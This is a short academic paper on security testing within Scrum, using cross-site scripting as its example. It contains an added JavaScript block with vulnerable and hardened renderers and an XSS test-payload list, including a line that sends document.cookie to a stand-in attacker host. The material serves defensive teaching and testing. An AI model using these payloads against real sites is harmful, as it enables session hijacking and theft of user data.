Security Testing from the Point of View of Scrum Development
Rudra Prasad Tripathy
Ph.D. scholar, Utkal University
Technical Architect, JDA India Software (P) Ltd.
Ranjit Kumar Grupo
Senior Professional, MindTree Limited
panda. [email protected] com
Abstract: We try to show how security testing plays a predominant role in secure development, and how an agile methodology, particularly scrum, is a suitable development process for it.
Keywords: scrum; security testing.
1. Introduction
Application security has drawn attention for the last few years, as security no longer belongs to network protection alone but transcends it. Security testing is also at the heart of secure development, though it is not getting its due importance. In this paper we discuss the issues involved in security testing in a traditional software development lifecycle approach such as waterfall, and compare it with scrum, an agile methodology, to determine how scrum could smooth a few of those issues and assist security testing. We take cross-site scripting as the example to illustrate the study.
1.1 What is security testing?
Security testing basically deals with trying to break the application the way an attacker would. This differs from traditional testing because of the following idiosyncratic features.
a. Traditional testing does not deal with what happens when the system fails, whereas security testing aims to break the system and plays the role of an adversary. Therefore, apart from tools and frameworks, it requires dexterity and knowledge to derive suitable test cases.
b. It is part of risk management and so must reckon the cost involved. We may have to define adequate security in the parlance of the application's business domain and the value at stake. For example, the definition of adequate security for an online credit card application and for an online health care system may differ. Consequently, prioritization and budgeting of resources are among the factors that need to be considered.
c. Assessment of the different possible vulnerabilities.
1.2 Security testing approaches
At present, application security testing is done as white box testing, possibly with the help of a few tools such as static analysis tools to study vulnerabilities. Non-functional testing is also conducted to see the chance of failure against a vicarious attack by an adversary.
1.3 Cross-Site Scripting
Cross-Site Scripting (XSS) vulnerabilities are tested as executing code in the web application. This occurs when dynamically generated web pages display user input, such as login information, that has not been properly validated, allowing an attacker to embed malicious script into the generated page and then execute that script in the browser of any user who views the page. XSS can generally be subdivided into two categories: stored and reflected attacks. In a stored attack the injected code is permanently stored on the target server, for instance in a database, or via a submission to a bulletin board or visitor log, and is served to every later visitor. A reflected attack, however, comes from elsewhere: user input from a web client is immediately included, via server-side scripts, in a dynamically generated web page. Inadequate filtering of client-supplied data that the web application returns to web users is the major cause. In many cases the client-supplied data is also used in HTTP headers; with a carriage return-line feed sequence an attacker can add HTTP headers to the response and completely write the body of the HTTP response.
2. MOTIVATION
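The following is an added example, not code from the paper or from the applications it describes. It models, in a few lines of plain JavaScript, the three mechanisms just described (reflected XSS, stored XSS, and CRLF header injection) beside their hardened forms, and the adversarial test cases that section 1.1 calls for: payloads an attacker would send, checked against the property "no payload reaches the page verbatim". The guestbook array stands in for a database, the payload list and the redirect target are constructed inputs, and no real server is involved.

```javascript
// Added example (not from the paper). A toy server-side renderer with the
// two XSS variants from the text, their hardened versions, a header-injection
// case, and the adversarial test cases security testing requires.

// Encode the five characters that matter in HTML text and attribute contexts.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Reflected XSS: the query comes straight from the request and is echoed back.
function renderSearchUnsafe(query) {
  return `<p>Results for: ${query}</p>`;
}
function renderSearchSafe(query) {
  return `<p>Results for: ${escapeHtml(query)}</p>`;
}

// Stored XSS: entries are persisted (an in-memory array stands in for the
// database) and rendered for every later visitor.
function createGuestbook() {
  const entries = [];
  return {
    post(text) { entries.push(text); },
    renderUnsafe() { return entries.map(e => `<li>${e}</li>`).join(""); },
    renderSafe() { return entries.map(e => `<li>${escapeHtml(e)}</li>`).join(""); },
  };
}

// Header injection: a header value containing CR/LF ends the header block
// early, so the attacker supplies a response body of their own.
function buildResponse(headers, body) {
  return headers.map(([n, v]) => `${n}: ${v}`).join("\r\n") + "\r\n\r\n" + body;
}
function redirectUnsafe(target) {
  return buildResponse([["Location", target]], "");
}
function redirectSafe(target) {
  // Reject the separator outright; a real framework should do this for you.
  if (/[\r\n]/.test(target)) throw new Error("CR/LF in header value");
  return buildResponse([["Location", target]], "");
}

// Security test cases: constructed payloads an adversary would send. Each
// contains at least one of < > " ' so an escaped page can never echo it as is.
const XSS_PAYLOADS = [
  "<script>alert(1)</script>",
  "\"><img src=x onerror=alert(1)>",
  "' onmouseover='alert(1)",
  "</li><script>location='http://attacker.example/?c='+document.cookie</script>",
];

// Run every payload through a render function; a test passes when the
// payload does not survive verbatim into the generated page.
function runXssTests(render) {
  return XSS_PAYLOADS.map(payload => {
    const page = render(payload);
    return { payload, passed: !page.includes(payload) };
  });
}

function allPassed(results) {
  return results.every(r => r.passed);
}
```

Used as a security test suite, `runXssTests(renderSearchUnsafe)` fails on every payload while `runXssTests(renderSearchSafe)` passes; the stored case is exercised by posting each payload to a fresh guestbook and rendering it. The header case shows that `redirectUnsafe` with a CR/LF-laden target yields a response containing a second header/body boundary, which `redirectSafe` refuses. Output encoding is the defence the text's "inadequate filtering" points at; it is context dependent, and the escaper here covers HTML text and quoted attribute values only, not URL, JavaScript or CSS contexts.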
In one of the web applications, an XSS vulnerability was found through the use of a third-party component. This was a critical defect. The design had been completed, and after implementation the code had been tested by the security compliance team. Cross-site scripting carried out on websites accounted for roughly the majority of all security vulnerabilities documented by Symantec as of 2007. A full security review usually involves more...